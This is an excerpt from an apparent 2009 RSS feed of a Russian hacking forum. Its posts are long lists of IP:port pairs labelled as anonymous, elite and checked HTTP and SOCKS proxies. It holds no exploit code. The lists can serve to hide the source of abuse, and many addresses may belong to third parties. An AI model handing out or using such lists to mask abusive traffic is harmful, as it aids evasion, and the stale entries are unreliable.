/&gt;121.8.124.42:1080&lt;br /&gt;122.231.65.248:1080&lt;br /&gt;69.254.99.201:51209&lt;br /&gt;61.116.180.130:1080&lt;br /&gt;61.116.180.190:1080&lt;br /&gt;61.116.180.191:1080&lt;br /&gt;202.152.44.62:1080&lt;br /&gt;76.125.212.249:56427&lt;br /&gt;68.41.16.145:2871&lt;br /&gt;75.43.78.173:18117&lt;br /&gt;61.116.180.191:1080&lt;br /&gt;123.124.255.114:1080&lt;br /&gt;24.61.253.220:58707&lt;br /&gt;61.116.180.190:1080&lt;br /&gt;61.116.180.130:1080&lt;br /&gt;72.28.238.47:23699&lt;br /&gt;122.231.65.248:1080&lt;br /&gt;68.41.16.145:2871&lt;br /&gt;76.110.19.233:22535&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Stemp-Admin)</author>
			<pubDate>Sat, 20 Jun 2009 02:23:18 +0400</pubDate>
			<guid>http://xakforum.mybb.forum/viewtopic.php?pid=57#p57</guid>
		</item>
		<item>
			<title>anon</title>
			<link>http://xakforum.mybb.forum/viewtopic.php?pid=56#p56</link>
			<description>&lt;p&gt;&lt;span style=&quot;color: red&quot;&gt;222.123.56.118:3128&lt;br /&gt;99.199.237.158:9090&lt;br /&gt;98.230.46.95:9090&lt;br /&gt;98.216.3.48:9090&lt;br /&gt;98.193.185.111:9090&lt;br /&gt;96.21.139.56:9090&lt;br /&gt;96.18.113.254:9090&lt;br /&gt;93.188.168.68:80&lt;br /&gt;93.100.16.90:8080&lt;br /&gt;92.233.176.50:9090&lt;br /&gt;91.194.85.198:6654&lt;br /&gt;91.147.97.179:3128&lt;br /&gt;91.121.84.92:80&lt;br /&gt;89.42.113.19:808&lt;br /&gt;89.101.241.30:9090&lt;br /&gt;88.81.155.30:80&lt;br /&gt;86.12.38.149:9090&lt;br /&gt;84.235.0.182:8080&lt;br /&gt;83.64.147.45:3128&lt;br /&gt;83.223.140.235:80&lt;br /&gt;83.220.195.232:9090&lt;br /&gt;83.18.253.131:80&lt;br /&gt;83.169.81.16:80&lt;br /&gt;82.33.194.185:9090&lt;br /&gt;82.204.37.210:8080&lt;br /&gt;82.134.53.6:80&lt;br /&gt;80.88.242.32:9090&lt;br /&gt;80.6.67.111:9090&lt;br /&gt;80.34.164.229:8090&lt;br /&gt;80.241.33.242:3128&lt;br /&gt;80.126.22.246:80&lt;br /&gt;79.4.134.26:8080&lt;br /&gt;77.226.240.50:8080&lt;br /&gt;76.173.95.124:9090&lt;br /&gt;76.116.82.97:9090&lt;br /&gt;76.113.8.160:9090&lt;br /&gt;76.107.108.228:9090&lt;br /&gt;76.107.108.144:9090&lt;br /&gt;76.104.116.58:9090&lt;br /&gt;75.83.57.219:9090&lt;br /&gt;75.81.22.134:9090&lt;br /&gt;75.71.201.116:9090&lt;br /&gt;75.145.25.50:80&lt;br /&gt;74.211.5.196:9090&lt;br /&gt;72.9.104.5:80&lt;br /&gt;72.136.252.159:9090&lt;br /&gt;71.91.44.14:9090&lt;br /&gt;71.205.109.70:9090&lt;br /&gt;71.195.130.227:9090&lt;br /&gt;70.64.225.85:9090&lt;br /&gt;70.180.173.142:9090&lt;br /&gt;70.119.146.106:9090&lt;br /&gt;69.248.79.217:9090&lt;br /&gt;69.246.95.252:9090&lt;br /&gt;69.246.61.14:9090&lt;br /&gt;69.246.32.76:9090&lt;br /&gt;69.245.52.76:9090&lt;br /&gt;69.22.113.10:9090&lt;br /&gt;69.196.215.65:7212&lt;br /&gt;69.162.81.140:80&lt;br /&gt;69.120.173.183:9090&lt;br /&gt;68.84.47.147:9090&lt;br /&gt;68.60.189.199:9090&lt;br /&gt;68.49.71.4:80&lt;br /&gt;68.2.104.70:9090&lt;br /&gt;67.217.17.182:9090&lt;br /&gt;67.206.81.35:80&lt;br /&gt;66.91.101.52:9090&lt;br /&gt;66.57.75.68:9090&lt;br /&gt;66.244.214.230:80&lt;br /&gt;66.232.106.145:80&lt;br /&gt;66.184.78.194:9090&lt;br /&gt;66.167.100.59:6649&lt;br /&gt;66.155.123.214:808&lt;br /&gt;66.128.38.41:8080&lt;br /&gt;66.119.43.32:80&lt;br /&gt;66.110.146.144:9090&lt;br /&gt;65.65.219.98:29122&lt;br /&gt;65.190.0.99:9090&lt;br /&gt;64.76.109.207:80&lt;br /&gt;64.22.118.170:81&lt;br /&gt;63.208.148.223:80&lt;br /&gt;62.193.246.10:6654&lt;br /&gt;62.144.34.207:3128&lt;br /&gt;62.144.34.206:3128&lt;br /&gt;61.91.165.29:3128&lt;br /&gt;61.90.185.168:80&lt;br /&gt;61.234.254.69:8088&lt;br /&gt;61.19.222.7:80&lt;br /&gt;61.133.196.40:80&lt;br /&gt;61.133.196.36:80&lt;br /&gt;60.63.26.193:80&lt;br /&gt;60.250.27.242:80&lt;br /&gt;60.22.156.41:808&lt;br /&gt;59.56.174.199:808&lt;br /&gt;58.52.202.7:808&lt;br /&gt;58.20.51.207:808&lt;br /&gt;41.247.46.126:8080&lt;br /&gt;38.103.164.179:9090&lt;br /&gt;38.103.164.178:9090&lt;br /&gt;38.103.164.174:9090&lt;br /&gt;24.79.173.214:9090&lt;br /&gt;24.77.169.85:9090&lt;br /&gt;24.70.39.70:9090&lt;br /&gt;24.44.219.167:9090&lt;br /&gt;24.3.145.226:9090&lt;br /&gt;24.3.105.116:9090&lt;br /&gt;24.254.34.183:9090&lt;br /&gt;24.153.249.240:9090&lt;br /&gt;24.139.68.242:9090&lt;br /&gt;24.10.84.226:9090&lt;br /&gt;222.190.124.19:8000&lt;br /&gt;222.188.91.85:8080&lt;br /&gt;222.184.56.3:80&lt;br /&gt;221.130.193.14:8080&lt;br /&gt;221.124.131.25:9090&lt;br /&gt;221.12.147.80:808&lt;br /&gt;221.11.27.110:8080&lt;br /&gt;220.130.81.188:8000&lt;br /&gt;220.128.122.187:80&lt;br /&gt;218.91.251.62:8089&lt;br /&gt;218.75.83.98:8081&lt;br /&gt;218.75.76.74:8088&lt;br /&gt;218.75.23.110:3128&lt;br /&gt;218.252.41.203:80&lt;br /&gt;218.241.141.37:8080&lt;br /&gt;218.241.141.35:8080&lt;br /&gt;218.206.194.247:8800&lt;br /&gt;218.194.80.220:808&lt;br /&gt;218.182.134.23:8080&lt;br /&gt;218.180.141.30:8080&lt;br /&gt;218.113.112.23:8080&lt;br /&gt;217.9.143.95:8081&lt;br /&gt;216.129.228.87:8080&lt;br /&gt;213.97.52.28:8080&lt;br /&gt;213.41.71.164:80&lt;br /&gt;213.130.105.148:8080&lt;br /&gt;212.123.91.61:6969&lt;br /&gt;212.123.91.61:81&lt;br /&gt;212.123.91.165:80&lt;br /&gt;211.99.188.218:80&lt;br /&gt;211.161.197.182:80&lt;br /&gt;211.100.4.71:80&lt;br /&gt;210.86.181.202:80&lt;br /&gt;210.86.181.201:80&lt;br /&gt;210.82.31.151:80&lt;br /&gt;210.52.15.210:808&lt;br /&gt;210.196.98.51:80&lt;br /&gt;210.128.252.88:80&lt;br /&gt;209.81.105.179:8080&lt;br /&gt;209.237.195.162:80&lt;br /&gt;208.78.100.130:80&lt;br /&gt;208.77.219.76:80&lt;br /&gt;208.20.21.160:8080&lt;br /&gt;208.20.21.157:8080&lt;br /&gt;207.35.173.123:3128&lt;br /&gt;207.35.172.214:80&lt;br /&gt;207.35.172.213:80&lt;br /&gt;206.167.158.131:8080&lt;br /&gt;206.161.120.40:2008&lt;br /&gt;203.82.52.210:8080&lt;br /&gt;203.70.96.10:80&lt;br /&gt;203.149.32.30:8080&lt;br /&gt;203.145.117.183:80&lt;br /&gt;203.113.137.66:8888&lt;br /&gt;203.110.240.22:80&lt;br /&gt;202.99.29.27:80&lt;br /&gt;202.85.94.25:8088&lt;br /&gt;202.78.227.32:8080&lt;br /&gt;202.197.64.42:80&lt;br /&gt;202.168.193.131:80&lt;br /&gt;202.106.121.134:80&lt;br /&gt;201.229.208.3:80&lt;br /&gt;201.229.208.2:80&lt;br /&gt;200.8.0.139:8000&lt;br /&gt;200.31.42.3:80&lt;br /&gt;200.221.10.104:80&lt;br /&gt;200.104.250.91:80&lt;br /&gt;20.132.16.22:80&lt;br /&gt;198.110.167.72:80&lt;br /&gt;196.211.117.187:8080&lt;br /&gt;195.57.124.85:80&lt;br /&gt;195.226.16.132:80&lt;br /&gt;194.246.124.85:80&lt;br /&gt;194.176.176.82:8080&lt;br /&gt;194.144.60.91:80&lt;br /&gt;194.126.12.115:8080&lt;br /&gt;194.117.157.72:17375&lt;br /&gt;194.117.157.72:24874&lt;br /&gt;194.117.157.72:33534&lt;br /&gt;194.117.157.72:14668&lt;br /&gt;194.117.157.72:22622&lt;br /&gt;194.117.157.72:14572&lt;br /&gt;194.117.157.72:12219&lt;br /&gt;194.117.157.72:11251&lt;br /&gt;194.106.115.117:80&lt;br /&gt;194.106.115.116:80&lt;br /&gt;193.69.186.83:80&lt;br /&gt;193.218.155.59:80&lt;br /&gt;189.166.72.129:80&lt;br /&gt;187.8.40.158:6588&lt;br /&gt;174.36.168.194:8080&lt;br /&gt;174.36.168.133:8080&lt;br /&gt;174.129.225.131:80&lt;br /&gt;174.0.50.242:9090&lt;br /&gt;160.79.139.56:80&lt;br /&gt;160.75.90.69:80&lt;br /&gt;158.109.138.132:80&lt;br /&gt;156.17.207.8:80&lt;br /&gt;151.79.46.58:8080&lt;br /&gt;140.113.156.245:3128&lt;br /&gt;137.56.244.38:80&lt;br /&gt;130.63.177.192:8080&lt;br /&gt;125.89.73.159:80&lt;br /&gt;124.53.159.169:80&lt;br /&gt;124.207.168.48:808&lt;br /&gt;124.128.12.210:8088&lt;br /&gt;121.72.252.190:9090&lt;br /&gt;121.72.229.5:9090&lt;br /&gt;12.188.26.242:80&lt;br /&gt;119.245.138.129:3128&lt;br /&gt;119.147.23.118:8080&lt;br /&gt;118.98.232.202:8080&lt;br /&gt;116.11.32.210:8080&lt;/span&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Stemp-Admin)</author>
			<pubDate>Sat, 20 Jun 2009 02:20:43 +0400</pubDate>
			<guid>http://xakforum.mybb.forum/viewtopic.php?pid=56#p56</guid>
		</item>
		<item>
			<title>high anonymous</title>
			<link>http://xakforum.mybb.forum/viewtopic.php?pid=55#p55</link>
			<description>&lt;p&gt;194.36.10.154:3128&lt;br /&gt;133.1.74.163:3128&lt;br /&gt;133.1.74.163:68664&lt;br /&gt;69.118.237.19:9090&lt;br /&gt;72.55.191.6:3128&lt;br /&gt;128.111.52.62:3127&lt;br /&gt;128.111.52.62:3124&lt;br /&gt;137.226.138.154:3127&lt;br /&gt;150.65.32.66:3128&lt;br /&gt;136.145.115.194:3124&lt;br /&gt;133.1.16.172:3127&lt;br /&gt;134.2.172.253:3124&lt;br /&gt;211.90.22.106:8088&lt;br /&gt;132.187.230.1:3124&lt;br /&gt;132.239.17.224:3128&lt;br /&gt;207.61.241.100:9090&lt;br /&gt;201.229.208.3:80&lt;br /&gt;128.238.88.64:3128&lt;br /&gt;124.207.168.48:808&lt;br /&gt;128.238.88.65:3127&lt;br /&gt;192.33.210.17:3124&lt;br /&gt;142.150.238.12:3124&lt;br /&gt;208.117.131.116:3128&lt;br /&gt;221.130.193.14:80&lt;br /&gt;218.206.194.247:8800&lt;br /&gt;24.77.169.85:9090&lt;br /&gt;192.33.210.17:3128&lt;br /&gt;201.229.208.2:80&lt;br /&gt;193.167.182.132:3128&lt;br /&gt;193.167.182.130:3124&lt;br /&gt;218.97.194.94:80&lt;br /&gt;128.252.19.21:3124&lt;br /&gt;128.238.88.65:3124&lt;br /&gt;128.238.88.64:3124&lt;br /&gt;193.167.182.130:3128&lt;br /&gt;194.42.17.124:3124&lt;br /&gt;193.167.182.132:3124&lt;br /&gt;128.232.103.203:3124&lt;br /&gt;194.42.17.124:3127&lt;br /&gt;202.99.21.162:8081&lt;br /&gt;128.232.103.203:3127&lt;br /&gt;195.130.121.204:3124&lt;br /&gt;155.246.12.163:3127&lt;br /&gt;128.252.19.20:3124&lt;br /&gt;80.6.67.111:9090&lt;br /&gt;128.232.103.201:3127&lt;br /&gt;192.42.43.23:3124&lt;br /&gt;128.232.103.201:3124&lt;br /&gt;193.55.112.41:3128&lt;br /&gt;210.197.97.67:8080&lt;br /&gt;208.117.131.115:3127&lt;br /&gt;59.56.174.199:808&lt;br /&gt;192.42.43.23:3127&lt;br /&gt;221.124.131.25:9090&lt;br /&gt;61.234.254.69:8088&lt;br /&gt;64.246.18.25:8888&lt;br /&gt;124.128.12.210:8088&lt;br /&gt;58.52.202.7:808&lt;br /&gt;98.230.46.95:9090&lt;br /&gt;129.69.210.97:3124&lt;br /&gt;129.69.210.97:3127&lt;br /&gt;189.166.72.129:80&lt;br /&gt;218.75.23.110:3128&lt;br /&gt;208.117.131.115:3128&lt;br /&gt;206.161.120.40:2008&lt;br /&gt;195.130.121.205:3124&lt;br /&gt;203.110.240.22:80&lt;br /&gt;218.194.80.220:808&lt;br /&gt;24.70.39.70:9090&lt;br /&gt;76.107.139.191:9090&lt;br /&gt;68.104.55.221:9090&lt;br /&gt;218.248.21.194:80&lt;br /&gt;129.69.210.96:3127&lt;br /&gt;193.174.67.187:3128&lt;br /&gt;210.196.98.51:80&lt;br /&gt;195.135.236.204:3128&lt;br /&gt;134.2.172.252:3127&lt;br /&gt;70.186.168.130:9090&lt;br /&gt;219.34.2.65:8080&lt;br /&gt;218.252.37.227:808&lt;br /&gt;70.64.225.85:9090&lt;br /&gt;194.117.157.72:15226&lt;br /&gt;24.3.105.116:9090&lt;br /&gt;98.193.185.111:9090&lt;br /&gt;98.216.3.48:9090&lt;br /&gt;67.230.66.70:8000&lt;br /&gt;202.213.246.61:80&lt;br /&gt;69.47.165.83:9090&lt;br /&gt;94.102.57.2:3128&lt;br /&gt;68.2.104.70:9090&lt;br /&gt;221.12.147.80:808&lt;br /&gt;62.144.34.207:3128&lt;br /&gt;61.175.215.214:808&lt;br /&gt;24.164.253.14:9090&lt;br /&gt;194.117.157.72:10111&lt;br /&gt;69.136.58.38:9090&lt;br /&gt;202.98.116.15:808&lt;br /&gt;89.212.135.232:9090&lt;br /&gt;98.181.63.127:9090&lt;br /&gt;74.79.165.21:9090&lt;br /&gt;67.87.64.23:9090&lt;br /&gt;58.20.51.207:808&lt;br /&gt;222.35.140.73:808&lt;br /&gt;194.117.157.72:24874&lt;br /&gt;68.199.107.24:9090&lt;br /&gt;70.180.173.142:9090&lt;br /&gt;86.6.122.30:9090&lt;br /&gt;24.3.145.226:9090&lt;br /&gt;82.4.7.105:9090&lt;br /&gt;194.144.60.91:80&lt;br /&gt;99.247.210.73:9090&lt;br /&gt;66.244.214.230:80&lt;br /&gt;72.136.252.159:9090&lt;br /&gt;24.79.173.214:9090&lt;br /&gt;133.1.74.162:3124&lt;br /&gt;69.245.52.76:9090&lt;br /&gt;24.153.249.240:9090&lt;br /&gt;68.105.12.164:9090&lt;br /&gt;194.117.157.72:17375&lt;br /&gt;210.158.56.85:8080&lt;br /&gt;210.161.119.51:444&lt;br /&gt;70.74.69.172:9090&lt;br /&gt;201.80.188.229:8080&lt;br /&gt;193.174.67.186:3124&lt;br /&gt;86.61.76.7:8088&lt;br /&gt;64.13.251.55:5060&lt;br /&gt;194.117.157.72:19772&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Stemp-Admin)</author>
			<pubDate>Sat, 20 Jun 2009 02:19:02 +0400</pubDate>
			<guid>http://xakforum.mybb.forum/viewtopic.php?pid=55#p55</guid>
		</item>
		<item>
			<title>ЭЛИТНЫЕ ПРОКСИ</title>
			<link>http://xakforum.mybb.forum/viewtopic.php?pid=54#p54</link>
			<description>&lt;p&gt;195.89.143.211:8090 &lt;br /&gt;200.141.167.125:6588 &lt;br /&gt;83.167.122.41:3128 &lt;br /&gt;81.31.157.43:6654 &lt;br /&gt;65.75.189.33:8080 &lt;br /&gt;81.31.157.33:6654 &lt;br /&gt;222.116.180.23:3128 &lt;br /&gt;89.189.85.102:80 &lt;br /&gt;89.189.84.1:80 &lt;br /&gt;201.228.130.234:6588 &lt;br /&gt;80.191.3.6:8080 &lt;br /&gt;82.204.37.210:8080 &lt;br /&gt;89.189.84.25:80 &lt;br /&gt;98.16.253.47:8080 &lt;br /&gt;189.79.63.28:6588 &lt;br /&gt;194.246.124.85:80 &lt;br /&gt;201.53.19.192:6588 &lt;br /&gt;200.104.250.91:80&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Stemp-Admin)</author>
			<pubDate>Sat, 20 Jun 2009 02:18:08 +0400</pubDate>
			<guid>http://xakforum.mybb.forum/viewtopic.php?pid=54#p54</guid>
		</item>
		<item>
			<title>HTTP вроде как хорошие</title>
			<link>http://xakforum.mybb.forum/viewtopic.php?pid=53#p53</link>
			<description>&lt;p&gt;67.69.254.248:80&lt;br /&gt;128.233.252.12:3124&lt;br /&gt;189.1.180.181:3128&lt;br /&gt;67.69.254.253:80&lt;br /&gt;201.229.208.2:80&lt;br /&gt;201.229.208.3:80&lt;br /&gt;201.229.208.003:80&lt;br /&gt;222.88.242.189:3128&lt;br /&gt;218.28.58.86:3128&lt;br /&gt;218.75.100.114:8080&lt;br /&gt;216.165.109.79:3127&lt;br /&gt;216.165.109.79:3127&lt;br /&gt;84.233.227.57:8080&lt;br /&gt;194.36.10.154:3124&lt;br /&gt;67.69.254.245:80&lt;br /&gt;142.150.238.12:3124&lt;br /&gt;60.12.190.108:8088&lt;br /&gt;218.14.227.197:3128&lt;br /&gt;133.1.16.171:3124&lt;br /&gt;133.11.240.56:3124&lt;br /&gt;133.11.240.57:3127&lt;br /&gt;193.55.112.41:3127&lt;br /&gt;195.144.24.27:80&lt;br /&gt;193.55.112.41:3127&lt;br /&gt;77.226.240.50:8080&lt;br /&gt;67.69.254.245:80&lt;br /&gt;201.80.166.48:6588&lt;br /&gt;60.12.190.108:8088&lt;br /&gt;85.214.48.72:80&lt;br /&gt;60.12.190.108:8088&lt;br /&gt;150.65.32.68:3127&lt;br /&gt;58.22.101.251:80&lt;br /&gt;58.39.155.140:8088&lt;br /&gt;58.52.202.7:808&lt;br /&gt;58.222.254.13:3128&lt;br /&gt;60.2.93.11:80&lt;br /&gt;60.12.190.108:8088&lt;br /&gt;60.160.130.119:808&lt;br /&gt;60.217.80.36:8080&lt;br /&gt;61.133.196.40:80&lt;br /&gt;119.147.23.118:8080&lt;br /&gt;120.28.64.69:8080&lt;br /&gt;120.28.64.86:8080&lt;br /&gt;121.14.211.71:80&lt;br /&gt;121.22.29.180:80&lt;br /&gt;121.22.29.182:80&lt;br /&gt;121.22.29.183:80&lt;br /&gt;122.225.31.253:3128&lt;br /&gt;124.244.187.185:808&lt;br /&gt;125.245.196.194:8080&lt;br /&gt;143.248.139.56:3124&lt;br /&gt;202.129.181.242:8080&lt;br /&gt;202.156.14.74:80&lt;br /&gt;203.160.1.66:80&lt;br /&gt;203.160.1.75:80&lt;br /&gt;203.160.1.85:80&lt;br /&gt;203.160.1.103:80&lt;br /&gt;203.160.1.121:80&lt;br /&gt;211.95.176.6:808&lt;br /&gt;195.113.161.82:3124&lt;br /&gt;68.97.121.200:9090&lt;br /&gt;133.1.16.172:3124&lt;br /&gt;218.3.242.106:8080&lt;br /&gt;218.75.100.114:8080&lt;br /&gt;218.206.194.247:8800&lt;br /&gt;221.3.208.40:80&lt;br /&gt;221.122.66.85:8080&lt;br /&gt;222.88.242.189:3128&lt;br /&gt;222.184.56.3:80&lt;br /&gt;24.127.113.227:9090&lt;br /&gt;60.161.159.206:80&lt;br /&gt;60.218.99.18:8080&lt;br /&gt;62.75.214.139:3128&lt;br /&gt;62.129.243.66:80&lt;br /&gt;68.40.39.11:9090&lt;br /&gt;76.89.23.238:9090&lt;br /&gt;76.107.38.217:9090&lt;br /&gt;86.51.34.39:80&lt;br /&gt;87.236.195.86:3128&lt;br /&gt;89.189.84.1:80&lt;br /&gt;89.189.84.54:80&lt;br /&gt;98.247.53.216:9090&lt;br /&gt;120.138.110.210:3128&lt;br /&gt;122.18.104.60:8080&lt;br /&gt;123.203.119.147:808&lt;br /&gt;130.49.221.41:3127&lt;br /&gt;130.49.221.41:3127&lt;br /&gt;130.75.87.83:3124&lt;br /&gt;130.136.254.21:3124&lt;br /&gt;130.192.157.131:3124&lt;br /&gt;131.175.17.10:3124&lt;br /&gt;132.187.230.1:3128&lt;br /&gt;193.40.59.83:8080&lt;br /&gt;195.24.131.87:3128&lt;br /&gt;83.167.122.41:3128&lt;br /&gt;85.15.216.65:8080&lt;br /&gt;87.248.168.73:9090&lt;br /&gt;88.81.227.30:3128&lt;br /&gt;193.40.130.24:8080&lt;br /&gt;193.40.59.83:8080&lt;br /&gt;212.56.203.196:3128&lt;br /&gt;213.128.216.241:3128&lt;br /&gt;217.195.48.1:8080&lt;br /&gt;217.195.48.32:8080&lt;br /&gt;77.238.224.77:8080&lt;br /&gt;81.177.3.10:80&lt;br /&gt;85.15.216.65:8080&lt;br /&gt;87.248.168.73:9090&lt;br /&gt;89.207.240.235:3128&lt;br /&gt;89.208.43.141:80&lt;br /&gt;91.103.121.70:8080&lt;br /&gt;91.142.12.174:8080&lt;br /&gt;91.142.12.62:8080&lt;br /&gt;193.93.230.207:1080&lt;br /&gt;77.66.223.123:1080&lt;br /&gt;80.247.189.158:1080&lt;br /&gt;82.162.108.210:1080&lt;br /&gt;82.207.64.235:1080&lt;br /&gt;83.239.19.202:1080&lt;br /&gt;83.239.19.202:1080&lt;br /&gt;141.24.33.192:3124&lt;br /&gt;141.76.45.18:3124&lt;br /&gt;142.33.100.41:8080&lt;br /&gt;164.107.127.13:3124&lt;br /&gt;152.3.138.2:3128&lt;br /&gt;165.230.49.115:3128&lt;br /&gt;192.33.210.17:3124&lt;br /&gt;192.33.90.68:3124&lt;br /&gt;192.41.135.218:3124&lt;br /&gt;198.133.224.145:3124&lt;br /&gt;198.133.224.146:3127&lt;br /&gt;204.56.0.137:3124&lt;br /&gt;204.56.0.137:3124&lt;br /&gt;208.117.131.116:3124&lt;br /&gt;211.100.34.11:80&lt;br /&gt;125.89.161.189:8080&lt;br /&gt;142.150.238.13:3124&lt;br /&gt;142.150.238.12:3124&lt;br /&gt;128.233.252.11:3127&lt;br /&gt;164.107.127.13:3127&lt;br /&gt;194.36.10.154:3128&lt;br /&gt;217.172.187.98:80&lt;br /&gt;195.226.16.132:80&lt;br /&gt;200.31.42.3:80&lt;br /&gt;210.82.31.151:80&lt;br /&gt;60.247.2.241:8080&lt;br /&gt;202.239.242.75:8080&lt;br /&gt;203.82.52.210:8080&lt;br /&gt;82.204.37.210:8080&lt;br /&gt;203.82.52.210:8080&lt;br /&gt;130.63.177.192:8080&lt;br /&gt;82.204.37.210:8080&lt;br /&gt;203.104.252.222:80&lt;br /&gt;210.128.252.88:80&lt;br /&gt;210.238.184.144:3128&lt;br /&gt;210.238.184.150:3128&lt;br /&gt;219.96.216.34:3128&lt;br /&gt;220.111.137.188:8080&lt;br /&gt;196.213.163.58:8080&lt;br /&gt;118.98.161.122:3128&lt;br /&gt;118.98.169.66:80&lt;br /&gt;118.98.171.18:8080&lt;br /&gt;118.98.232.202:8080&lt;br /&gt;120.28.64.69:8080&lt;br /&gt;140.127.81.85:80&lt;br /&gt;211.72.151.94:3128&lt;br /&gt;60.251.132.43:3128&lt;br /&gt;61.222.193.228:3128&lt;br /&gt;67.78.144.22:80&lt;br /&gt;212.8.129.249:3128&lt;br /&gt;213.23.77.146:80&lt;br /&gt;217.172.187.98:80&lt;br /&gt;219.93.178.162:3128&lt;br /&gt;219.93.178.162:68664&lt;br /&gt;60.49.216.82:3128&lt;br /&gt;61.6.163.29:3128&lt;br /&gt;212.56.203.196:3128&lt;br /&gt;193.252.45.218:3128&lt;br /&gt;195.101.116.12:80&lt;br /&gt;195.144.24.27:80&lt;br /&gt;91.121.112.151:3128&lt;br /&gt;91.121.179.81:3128&lt;br /&gt;91.121.2.8:3128&lt;br /&gt;60.217.80.36:8080&lt;br /&gt;67.69.254.249:80&lt;br /&gt;72.36.112.71:3128&lt;br /&gt;72.55.191.6:3128&lt;br /&gt;121.207.252.139:80&lt;br /&gt;192.41.135.219:3124&lt;br /&gt;208.117.131.116:3128&lt;br /&gt;218.17.246.197:3128&lt;br /&gt;218.75.100.114:8080&lt;br /&gt;218.91.251.62:8089&lt;br /&gt;218.206.194.247:8800&lt;br /&gt;222.134.58.246:3128&lt;br /&gt;58.22.101.251:80&lt;br /&gt;12.51.72.38:9090&lt;br /&gt;24.230.182.225:9090&lt;br /&gt;64.66.192.62:32080&lt;br /&gt;67.69.254.240:80&lt;br /&gt;72.36.112.71:3128&lt;br /&gt;58.52.202.7:808&lt;br /&gt;71.205.113.223:9090&lt;br /&gt;71.77.147.94:9090&lt;br /&gt;75.64.232.63:9090&lt;br /&gt;209.159.204.250:9090&lt;br /&gt;67.149.165.201:9090&lt;br /&gt;194.117.157.72:12907&lt;br /&gt;201.62.131.46:6588&lt;br /&gt;24.99.208.196:9090&lt;br /&gt;60.160.130.119:808&lt;br /&gt;69.246.95.252:9090&lt;br /&gt;62.152.198.193:3128&lt;br /&gt;201.80.166.48:6588&lt;br /&gt;200.21.43.219:6588&lt;br /&gt;217.219.133.196:8080&lt;br /&gt;198.106.183.148:80&lt;br /&gt;220.111.137.188:8080&lt;br /&gt;200.94.69.198:8080&lt;br /&gt;71.254.149.34:8000&lt;br /&gt;217.195.48.3:8080&lt;br /&gt;200.97.135.42:80&lt;br /&gt;129.59.78.115:8118&lt;br /&gt;24.214.90.90:8000&lt;br /&gt;190.226.46.132:80&lt;br /&gt;24.72.15.57:9090&lt;br /&gt;67.69.254.249:80&lt;br /&gt;203.158.167.152:8080&lt;br /&gt;213.130.111.206:8080&lt;br /&gt;203.162.183.222:80&lt;br /&gt;196.5.66.11:80&lt;br /&gt;218.17.246.197:3128&lt;br /&gt;201.229.208.2:80&lt;br /&gt;125.245.196.194:8080&lt;br /&gt;61.133.196.40:80&lt;br /&gt;61.90.185.168:80&lt;br /&gt;210.86.181.202:80&lt;br /&gt;83.137.26.25:8080&lt;br /&gt;121.22.29.181:80&lt;br /&gt;67.69.254.247:80&lt;br /&gt;67.69.254.254:80&lt;br /&gt;167.206.55.215:80&lt;br /&gt;66.198.41.11:3128&lt;br /&gt;62.129.243.66:80&lt;br /&gt;61.139.73.6:8080&lt;br /&gt;77.88.66.251:8000&lt;br /&gt;201.229.208.3:80&lt;br /&gt;218.62.91.211:8080&lt;br /&gt;12.86.59.150:80&lt;br /&gt;213.41.71.164:80&lt;br /&gt;218.14.227.197:3128&lt;br /&gt;202.98.23.116:80&lt;br /&gt;89.189.84.11:80&lt;br /&gt;60.217.68.150:8080&lt;br /&gt;119.70.40.101:8080&lt;br /&gt;140.127.81.85:80&lt;br /&gt;62.240.183.82:8080&lt;br /&gt;219.93.178.162:3128&lt;br /&gt;200.49.141.73:8080&lt;br /&gt;200.174.85.195:3128&lt;br /&gt;203.160.1.75:80&lt;br /&gt;202.99.29.27:80&lt;br /&gt;220.111.137.188:8080&lt;br /&gt;189.56.150.110:8080&lt;br /&gt;121.22.29.183:80&lt;br /&gt;200.41.60.135:3128&lt;br /&gt;91.121.107.117:3128&lt;br /&gt;61.94.172.13:8080&lt;br /&gt;213.180.131.135:80&lt;br /&gt;80.80.12.123:80&lt;br /&gt;202.98.23.114:80&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Stemp-Admin)</author>
			<pubDate>Sat, 20 Jun 2009 02:17:30 +0400</pubDate>
			<guid>http://xakforum.mybb.forum/viewtopic.php?pid=53#p53</guid>
		</item>
		<item>
			<title>HTTP только чеканные.</title>
			<link>http://xakforum.mybb.forum/viewtopic.php?pid=52#p52</link>
			<description>&lt;p&gt;218.14.227.197:3128&lt;br /&gt;61.105.175.113:3128&lt;br /&gt;60.30.83.220:8080&lt;br /&gt;201.86.70.190:3128&lt;br /&gt;201.86.70.190:3128&lt;br /&gt;119.147.23.118:8080&lt;br /&gt;201.229.208.2:80&lt;br /&gt;201.30.141.82:3128&lt;br /&gt;201.229.208.003:80&lt;br /&gt;203.160.1.121:80&lt;br /&gt;203.160.1.66:80&lt;br /&gt;203.160.1.94:80&lt;br /&gt;203.160.1.103:80&lt;br /&gt;203.160.1.112:80&lt;br /&gt;203.160.1.75:80&lt;br /&gt;203.160.1.85:80&lt;br /&gt;67.69.254.251:80&lt;br /&gt;67.69.254.244:80&lt;br /&gt;200.94.106.76:8080&lt;br /&gt;121.207.252.139:80&lt;br /&gt;201.65.121.102:3128&lt;br /&gt;72.55.191.6:3128&lt;br /&gt;82.204.37.210:80&lt;br /&gt;82.204.37.210:80&lt;br /&gt;220.130.48.155:3128&lt;br /&gt;220.130.10.171:3128&lt;br /&gt;220.135.212.133:3128&lt;br /&gt;124.53.159.169:80&lt;br /&gt;80.88.242.32:9090&lt;br /&gt;77.240.82.6:80&lt;br /&gt;200.163.209.114:3128&lt;br /&gt;213.4.106.164:8080&lt;br /&gt;61.133.196.36:80&lt;br /&gt;60.191.96.90:808&lt;br /&gt;219.93.178.162:3128&lt;br /&gt;219.93.178.162:3128&lt;br /&gt;167.206.55.215:80&lt;br /&gt;204.194.251.15:80&lt;br /&gt;61.133.196.40:80&lt;br /&gt;120.28.64.86:8080&lt;br /&gt;202.57.48.195:3128&lt;br /&gt;125.163.84.140:8080&lt;br /&gt;125.245.196.194:8080&lt;br /&gt;209.17.190.136:3128&lt;br /&gt;210.82.31.151:80&lt;br /&gt;193.40.130.24:8080&lt;br /&gt;60.12.190.108:8088&lt;br /&gt;212.93.193.82:443&lt;br /&gt;212.93.193.78:443&lt;br /&gt;212.93.193.74:443&lt;br /&gt;212.93.193.83:443&lt;br /&gt;212.93.193.72:443&lt;br /&gt;84.233.227.57:8080&lt;br 